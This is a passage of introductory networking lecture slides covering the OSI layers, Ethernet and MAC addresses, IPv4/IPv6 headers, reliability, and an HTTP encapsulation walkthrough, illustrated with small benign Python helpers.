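The wrapping and unwrapping in the mail example can be sketched in a few lines. The helper names wrap and unwrap and the one-header-per-line format are assumptions made for this illustration; real network layers use binary headers.

```python
def wrap(header: str, payload: str) -> str:
    """A layer adds its own header in front of whatever the layer above gave it."""
    return f"{header}\n{payload}"


def unwrap(expected_prefix: str, packet: str) -> str:
    """A layer checks and strips only its own header, passing the rest upward."""
    header, payload = packet.split("\n", 1)
    if not header.startswith(expected_prefix):
        raise ValueError(f"unexpected header: {header!r}")
    return payload


# Sending side: each layer wraps what it receives from the layer above.
message = "I am hungry."
letter = wrap("Send to: Bob", message)
envelope = wrap("Mail to: 123 Bob St", letter)

# Receiving side: each layer removes only the header it understands.
received_letter = unwrap("Mail to:", envelope)
received_message = unwrap("Send to:", received_letter)

print(envelope)
print(received_message)
```

Neither layer needs to understand the other's header, which is what lets one layer be swapped out without affecting the rest.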

OSI Model

  • OSI model: Open Systems Interconnection model, a layered model of Internet communication
    • Originally divided into 7 layers
      • But layers 5 and 6 aren’t used in the real world, so we ignore them
      • And we’ll talk about layer 4.5 for encryption later
  • Same reliance upon abstraction
    • A layer can be implemented in different ways without affecting other layers
    • A layer’s protocol can be substituted with another protocol without affecting other layers

  Layer | Name
  ------+----------------
  7     | Application
  4     | Transport
  3     | (Inter) Network
  2     | Link
  1     | Physical

Layer 1: Physical Layer

  • Provides: Sending bits from one device to another
    • Encodes bits to send them over a physical link
      • Patterns of voltage levels
      • Photon intensities
      • RF modulation
  • Examples
    • Wi-Fi radios (IEEE 802.11)
    • Ethernet voltages (IEEE 802.3)

Layer 1: Physical Layer

A → B: 01110111…01

Physical layer: “How do I transmit this sequence of 0’s and 1’s from A to B?”

Next: How do we talk to more than one device?

Layer 2: Link Layer

  • Provides: Sending frames directly from one device to another
    • Relies upon: Sending bits from one device to another
    • Encodes messages into groups of bits called “frames”
  • Examples
    • Ethernet frames (IEEE 802.3)

Layer 2: Link Layer

  • Local area network (LAN): A set of computers on a shared network that can directly address one another
    • Consists of multiple physical links
  • Frames must consist of at least 3 things:
    • Source (“Who is this message coming from?”)
    • Destination (“Who is this message going to?”)
    • Data (“What does this message say?”)

Example frame (devices A, B, C, and D on the LAN):

  • Source: A
  • Destination: C
  • Data: “Hello, this is A…”

79 of 107

Layer 2: Link Layer

  • In reality, computers aren’t all connected to the same wire
    • Instead, local networks are a set of point-to-point links
  • However, Layer 2 still allows direct addressing between any two devices
    • Enabled by transmitting a frame across multiple physical links until it reaches its destination
    • Provides the abstraction that “everything is connected to one wire”

Example frame (devices A, B, C, D, and E joined by point-to-point links):

  • Source: A
  • Dest: C
  • Data: “Hello, this is A…”

80 of 107

Ethernet and MAC Addresses

Ethernet header

  • Destination MAC Address (6 bytes)
  • Source MAC Address (6 bytes)
  • VLAN Tag (4 bytes, optional)
  • Type (2 bytes)
  • Data (variable-length)
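A minimal sketch of packing these fields with Python's `struct` module, assuming an untagged frame (no VLAN tag). On the wire the destination address is sent before the source address. The helper names `mac_to_bytes` and `build_frame` are made up for this example; the type value 0x0800 is the standard EtherType for IPv4.

```python
import struct


def mac_to_bytes(mac: str) -> bytes:
    """Convert 'aa:bb:cc:dd:ee:ff' into 6 raw bytes."""
    return bytes(int(part, 16) for part in mac.split(":"))


def build_frame(dst: str, src: str, ethertype: int, payload: bytes) -> bytes:
    # 6-byte destination, 6-byte source, 2-byte type, all in network byte order.
    header = struct.pack("!6s6sH", mac_to_bytes(dst), mac_to_bytes(src), ethertype)
    return header + payload


frame = build_frame("6d:36:ff:4a:32:92", "20:61:84:3a:a9:52", 0x0800, b"hi")
print(frame.hex())
```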

81 of 107

Ethernet and MAC Addresses

  • Ethernet: A common layer 2 protocol that most endpoint devices use
  • MAC address: A 6-byte address that identifies a piece of network equipment (e.g. your phone’s Wi-Fi controller)
    • Stands for Media Access Control, not message authentication code
    • Typically represented as 6 hex bytes: 13:37:ca:fe:f0:0d
    • The first 3 bytes are assigned to manufacturers (i.e. who made the equipment)
      • This is useful for identifying what kind of device it is (e.g. its manufacturer)
    • The last 3 bytes are device-specific
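The split between the manufacturer bytes and the device-specific bytes can be shown with a short Python helper. The function name `split_mac` is hypothetical; no lookup against a real manufacturer registry is attempted here.

```python
from typing import Tuple


def split_mac(mac: str) -> Tuple[str, str]:
    """Return (manufacturer part, device-specific part) of a MAC address."""
    octets = bytes(int(part, 16) for part in mac.split(":"))
    if len(octets) != 6:
        raise ValueError("a MAC address has exactly 6 bytes")
    # First 3 bytes: assigned to the manufacturer. Last 3 bytes: device-specific.
    return octets[:3].hex(":"), octets[3:].hex(":")


manufacturer, device = split_mac("13:37:ca:fe:f0:0d")
print(manufacturer, device)
```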

82 of 107

Layer 2: Link Layer

Example frame:

  • Source: A
  • Dest: C
  • Data: “Hello, this is A…”

Link layer: “How do I transmit this frame from A to C, making sure that no one else thinks the message is for them?”

Next: How do we address every device in existence?

83 of 107

Layer 3: Network Layer

  • Provides: Sending packets from any device to any other device
    • Relies upon: Sending frames directly from one device to another
    • Encodes messages into groups of bits called “packets”
    • Bridges multiple LANs to provide global addressing
  • Examples
    • Internet Protocol (IP)

84 of 107

Layer 3: Network Layer

  • Recall the ideal layer 2 model: All devices can directly address all other devices
    • This would not scale to the size of the Internet!
  • Instead, allow packets to be routed across different devices to reach the destination
    • Each hop is allowed to use its own physical and link layers!
  • Basic model:
    • Is the destination of the packet directly connected to my LAN?
      • Pass it off to Layer 2
    • Otherwise, route the packet closer to the destination
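The basic model above amounts to a two-way decision. The sketch below uses Python's standard `ipaddress` module and assumes the LAN is described by an address prefix such as 192.168.1.0/24, a detail these slides have not introduced yet. The function name `next_step` and the example addresses are illustrative only.

```python
import ipaddress


def next_step(dest: str, my_lan: str, router: str) -> str:
    """Decide whether to hand a packet to layer 2 or to a router."""
    if ipaddress.ip_address(dest) in ipaddress.ip_network(my_lan):
        # The destination is on my LAN: layer 2 can reach it directly.
        return f"deliver directly to {dest} via layer 2"
    # Otherwise, pass the packet to a router that is closer to the destination.
    return f"forward to router {router}"


print(next_step("192.168.1.7", "192.168.1.0/24", "192.168.1.1"))
print(next_step("5.6.7.8", "192.168.1.0/24", "192.168.1.1"))
```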

Diagram: devices A through H, connected through a router.

85 of 107

Layer 3: Network Layer

Diagram: devices A, B, C, D, and E connected through a network of routers. A sends a packet:

  • Source: A
  • Destination: D
  • Data: “Hello, this is A…”

86 of 107

Layer 3: Network Layer

Diagram: devices A, B, C, D, and E connected through a network of routers. A sends a packet:

  • Source: A
  • Destination: D
  • Data: “Hello, this is A…”

One link along the route could be Wi-Fi and another could be Ethernet, but the Internet Protocol stays the same, end to end.

87 of 107

Layer 3: Network Layer

  • Packets must consist of at least 3 things:
    • Source (“Who is this message coming from?”)
    • Destination (“Who is this message going to?”)
    • Data (“What does this message say?”)
    • Similar to frames (layer 2)
  • Packets may be fragmented into smaller packets
    • Different links might support different maximum packet sizes
    • Up to the recipient to reassemble fragments into the original packet
    • In IPv4, any node may fragment a packet if it is too large to route
    • In IPv6, the sender must fragment the packet themselves
  • Each router forwards a given packet to the next hop
    • We will cover how a router knows where to forward a packet, and attacks on that process, in the future
  • Packets are not guaranteed to take a given route
    • Two packets with the same source and destination may take different routes
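Fragmentation and reassembly can be sketched as follows. This is a simplification: each fragment here carries a plain byte offset, whereas real IPv4 counts offsets in 8-byte units and uses a flag to mark whether more fragments follow. The function names are made up for the example.

```python
from typing import Iterable, List, Tuple

Fragment = Tuple[int, bytes]  # (byte offset into the original data, chunk)


def fragment(data: bytes, max_size: int) -> List[Fragment]:
    """Split data into chunks of at most max_size bytes, tagged with offsets."""
    return [(offset, data[offset:offset + max_size])
            for offset in range(0, len(data), max_size)]


def reassemble(fragments: Iterable[Fragment]) -> bytes:
    """Recipient side: sort by offset, then concatenate the chunks."""
    return b"".join(chunk for _, chunk in sorted(fragments))


original = b"Hello, this is A"
pieces = fragment(original, 5)
# Fragments may arrive in any order; the offsets let the recipient fix that.
print(reassemble(reversed(pieces)) == original)
```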

88 of 107

Internet Protocol (IP)

IPv4 header

Each row is one 32-bit word:

  • Version (4 bits) | Header Length (4 bits) | Type of Service (6 bits) | ECN (2 bits) | Total Length (16 bits)
  • Identification (16 bits) | Flags (3 bits) | Fragment Offset (13 bits)
  • Time to Live (8 bits) | Protocol (8 bits) | Header Checksum (16 bits)
  • Source Address (32 bits)
  • Destination Address (32 bits)
  • Options (variable length)
  • Data (variable length)
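To make the field sizes concrete, here is a sketch that unpacks the fixed 20-byte part of an IPv4 header with Python's `struct` module. Options are ignored, and the function name and dictionary keys are choices made for this example. The header length field counts 32-bit words, so it is multiplied by 4 to get bytes.

```python
import ipaddress
import struct


def parse_ipv4_header(raw: bytes) -> dict:
    """Parse the first 20 bytes of an IPv4 header (options are not handled)."""
    (ver_ihl, tos_ecn, total_length, identification, flags_frag,
     ttl, protocol, checksum, src, dst) = struct.unpack("!BBHHHBBH4s4s", raw[:20])
    return {
        "version": ver_ihl >> 4,                      # top 4 bits
        "header_length_bytes": (ver_ihl & 0x0F) * 4,  # low 4 bits, in 32-bit words
        "type_of_service": tos_ecn >> 2,              # top 6 bits
        "ecn": tos_ecn & 0x03,                        # low 2 bits
        "total_length": total_length,
        "identification": identification,
        "flags": flags_frag >> 13,                    # top 3 bits
        "fragment_offset": flags_frag & 0x1FFF,       # low 13 bits
        "ttl": ttl,
        "protocol": protocol,
        "header_checksum": checksum,
        "source": str(ipaddress.IPv4Address(src)),
        "destination": str(ipaddress.IPv4Address(dst)),
    }


# A hand-built sample header (checksum left as 0 for simplicity).
sample = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40, 1, 0x4000, 64, 6, 0,
                     bytes([1, 2, 3, 4]), bytes([5, 6, 7, 8]))
print(parse_ipv4_header(sample))
```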

89 of 107

Internet Protocol (IP)

  • Internet Protocol (IP): The universal layer-3 protocol that all devices use to transmit data over the Internet
  • IP address: An address that identifies a device on the Internet
    • IPv4 is 32 bits, typically written as 4 decimal octets, e.g. 35.163.72.93
    • IPv6 is 128 bits, typically written as 8 groups of 4 hex digits (2 bytes each): 2607:f140:8801::1:23
      • Leading zeros in a group may be dropped, and :: stands for a run of all-zero groups, so this expands to 2607:f140:8801:0000:0000:0000:0001:0023
    • Globally unique from any single perspective
      • For now, you can think of them as just being globally unique
    • IP addresses help nodes make decisions on where to forward the packet
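Python's standard `ipaddress` module can be used to check the address sizes and the IPv6 shorthand described above. The variable names are arbitrary.

```python
import ipaddress

v4 = ipaddress.ip_address("35.163.72.93")
v6 = ipaddress.ip_address("2607:f140:8801::1:23")

print(len(v4.packed) * 8)  # address size in bits
print(len(v6.packed) * 8)  # address size in bits
print(v6.exploded)         # every group written out with all 4 hex digits
print(v6.compressed)       # back to the shorthand form
```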

90 of 107

Reliability

  • Reliability ensures that packets are received correctly or, if random errors occur, not at all
    • This is implemented with a checksum
    • However, there is no cryptographic MAC, so there are no guarantees if an attacker modifies packets
  • IP is unreliable and only provides a best effort delivery service, which means:
    • Packets may be lost (“dropped”)
    • Packets may be corrupted
    • Packets may be delivered out of order
  • It is up to higher level protocols to ensure that the connection is reliable
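For a sense of what such a checksum looks like, below is a sketch of the 16-bit one's-complement "Internet checksum" used for the IPv4 header. The sample header bytes are a commonly cited worked example rather than something from this lecture. Because the computation needs no secret, an attacker who modifies a packet can simply recompute it, which is why it only guards against random errors.

```python
def internet_checksum(data: bytes) -> int:
    """16-bit one's-complement sum of all 16-bit words, then inverted."""
    if len(data) % 2:
        data += b"\x00"  # pad to a whole number of 16-bit words
    total = 0
    for i in range(0, len(data), 2):
        total += (data[i] << 8) | data[i + 1]
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)  # fold carries back in
    return ~total & 0xFFFF


# Sender: compute over the header with the checksum field set to zero.
header = bytes.fromhex("450000730000400040110000c0a80001c0a800c7")
print(hex(internet_checksum(header)))

# Receiver: recomputing over the header including the checksum gives 0.
filled = bytes.fromhex("45000073000040004011b861c0a80001c0a800c7")
print(internet_checksum(filled) == 0)
```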

91 of 107

Layer 3: Network Layer

Diagram: devices A, B, C, D, and E connected through a network of routers. A sends a packet:

  • Source: A
  • Destination: D
  • Data: “Hello, this is A…”

Layer 3: “How do I get this packet from A to D?”

Next: How do we reliably send any length of data, not just packets?

92 of 107

Layer 4: Transport Layer

  • Provides: Transportation of variable-length data from any point to any other point
    • Relies upon: Sending packets from any device to any other device
    • Builds abstractions that are useful to applications on top of layer 3 packets
  • Useful abstractions
    • Reliability: Transmit data reliably, in order
    • Ports: Provide multiple “addresses” per real IP address
  • Examples
    • TCP: Provides reliability and ports
    • UDP: Provides ports, but no reliability
    • We’ll talk a lot about these protocols soon!
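One way to picture "reliably, in order" on top of unreliable packets is to number each piece and have the receiver release data only in sequence. The sketch below is a toy model, not TCP: it numbers whole segments (TCP numbers bytes) and has no acknowledgments or retransmission. The function name is hypothetical.

```python
from typing import Iterable, Tuple


def deliver_in_order(segments: Iterable[Tuple[int, bytes]]) -> Tuple[bytes, int]:
    """Return (data deliverable so far, next sequence number still missing)."""
    received = {}
    for seq, data in segments:
        received.setdefault(seq, data)  # a duplicate segment is ignored
    delivered = []
    expected = 0
    while expected in received:
        delivered.append(received[expected])
        expected += 1
    # Anything after a gap is held back until the missing segment arrives.
    return b"".join(delivered), expected


# Segments arrive out of order, one is duplicated, and segment 2 is lost.
arrived = [(1, b"lo, "), (0, b"Hel"), (1, b"lo, "), (3, b"ld")]
print(deliver_in_order(arrived))
```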

93 of 107

Layer 4: Transport Layer

Diagram: A sends to D across the unreliable Internet: “I am now sending an arbitrary length message that will probably be broken into several packets…”

Layer 4: “How do I transport this arbitrary data over an unreliable medium?”

94 of 107

Layer 7: Application Layer

  • Provides: Applications and services to users!
    • Relies upon: Transportation of variable-length data from any point to any other point
  • Every online application is Layer 7
    • Web browsing
    • Online video games
    • Messaging services
    • Video calls (Zoom)

95 of 107

Layers of Abstraction and Headers

  • As you move to lower layers, you wrap additional headers around the message
  • As you move to higher layers, you peel off headers around the message
  • When sending a message we go from the highest to the lowest layer
  • When receiving a message we go from the lowest to highest layer
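The wrapping and peeling described above can be sketched with plain strings. The bracketed header format is invented for this illustration and is not how real headers are encoded; the function names are also hypothetical.

```python
from typing import List, Tuple


def encapsulate(message: str, headers: List[str]) -> str:
    """Sending: wrap headers around the message, highest layer first."""
    for header in headers:
        message = f"[{header}]{message}"
    return message


def decapsulate(wire: str, layers: int) -> Tuple[List[str], str]:
    """Receiving: peel off headers, lowest layer first."""
    peeled = []
    for _ in range(layers):
        end = wire.index("]")
        peeled.append(wire[1:end])
        wire = wire[end + 1:]
    return peeled, wire


wire = encapsulate("GET / HTTP/1.1", [
    "TCP 1234->80",
    "IP 1.2.3.4->5.6.7.8",
    "ETH 20:61:84:3a:a9:52->6d:36:ff:4a:32:92",
])
print(wire)
print(decapsulate(wire, 3))
```

The last header added (the link-layer one) ends up outermost, so it is also the first one the receiver removes.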

96 of 107

Example: HTTP Request

Diagram: the sender and the recipient each run the same stack (HTTP, TCP, IP, Ethernet, Wires). Message at this step:

  • HTTP: GET / HTTP/1.1 ...

97 of 107

Example: HTTP Request

Message at this step, outermost header first:

  • TCP header: From: Port 1234, To: Port 80
  • HTTP: GET / HTTP/1.1 ...

98 of 107

Example: HTTP Request

Message at this step, outermost header first:

  • IP header: From: 1.2.3.4, To: 5.6.7.8 (final destination)
  • TCP header: From: Port 1234, To: Port 80
  • HTTP: GET / HTTP/1.1 ...

99 of 107

Example: HTTP Request

Message at this step, outermost header first:

  • Ethernet header: From: 20:61:84:3a:a9:52, To: 6d:36:ff:4a:32:92 (address of next hop)
  • IP header: From: 1.2.3.4, To: 5.6.7.8
  • TCP header: From: Port 1234, To: Port 80
  • HTTP: GET / HTTP/1.1 ...

100 of 107

Example: HTTP Request

Message at this step, outermost header first:

  • Ethernet header: From: 20:61:84:3a:a9:52, To: 6d:36:ff:4a:32:92
  • IP header: From: 1.2.3.4, To: 5.6.7.8
  • TCP header: From: Port 1234, To: Port 80
  • HTTP: GET / HTTP/1.1 ...

Converted into bits and transmitted

101 of 107

Example: HTTP Request

Received over the physical medium. Message at this step, outermost header first:

  • Ethernet header: From: 89:8d:33:25:47:24, To: d5:a9:20:68:e0:80
  • IP header: From: 1.2.3.4, To: 5.6.7.8
  • TCP header: From: Port 1234, To: Port 80
  • HTTP: GET / HTTP/1.1 ...

Notice: The MAC addresses changed because the recipient is on a different network
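The change in MAC addresses can be sketched as a per-hop rewrite: each hop replaces the link-layer addresses while the IP addresses and payload pass through untouched. The `Frame` class and `forward` function are hypothetical names for this illustration; the address values are the ones shown in this example.

```python
from dataclasses import dataclass, replace


@dataclass(frozen=True)
class Frame:
    src_mac: str
    dst_mac: str
    src_ip: str
    dst_ip: str
    payload: str


def forward(frame: Frame, out_mac: str, next_hop_mac: str) -> Frame:
    # Only the layer 2 addresses are rewritten; layer 3 and above are unchanged.
    return replace(frame, src_mac=out_mac, dst_mac=next_hop_mac)


sent = Frame("20:61:84:3a:a9:52", "6d:36:ff:4a:32:92",
             "1.2.3.4", "5.6.7.8", "GET / HTTP/1.1")
received = forward(sent, "89:8d:33:25:47:24", "d5:a9:20:68:e0:80")
print(received)
```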

102 of 107

Example: HTTP Request

Message at this step, outermost header first:

  • Ethernet header: From: 89:8d:33:25:47:24, To: d5:a9:20:68:e0:80
  • IP header: From: 1.2.3.4, To: 5.6.7.8
  • TCP header: From: Port 1234, To: Port 80
  • HTTP: GET / HTTP/1.1 ...

103 of 107

Example: HTTP Request

Message at this step, outermost header first:

  • IP header: From: 1.2.3.4, To: 5.6.7.8
  • TCP header: From: Port 1234, To: Port 80
  • HTTP: GET / HTTP/1.1 ...

104 of 107

Example: HTTP Request

Message at this step, outermost header first:

  • TCP header: From: Port 1234, To: Port 80
  • HTTP: GET / HTTP/1.1 ...

105 of 107

Example: HTTP Request

Message at this step:

  • HTTP: GET / HTTP/1.1 ...

106 of 107

Example: HTTP Request

What each layer in the stack relies upon and provides:

  • HTTP relies upon: Transport of data
  • TCP provides: Transport of data; relies upon: Global packet delivery
  • IP provides: Global packet delivery; relies upon: Local frame delivery
  • Ethernet provides: Local frame delivery; relies upon: Communication of bits
  • Wires provide: Communication of bits

107 of 107

Summary: Intro to Networking

  • Internet: A global network of computers
    • Protocols: Agreed-upon systems of communication
  • OSI model: A layered model of protocols
    • Layer 1: Communication of bits
    • Layer 2: Local frame delivery
      • Ethernet: The most common Layer 2 protocol
      • MAC addresses: 6-byte addressing system used by Ethernet
    • Layer 3: Global packet delivery
      • IP: The universal Layer 3 protocol
      • IP addresses: 4-byte (or 16-byte) addressing system used by IP
    • Layer 4: Transport of data (more on this next time)
    • Layer 7: Applications and services (the web)
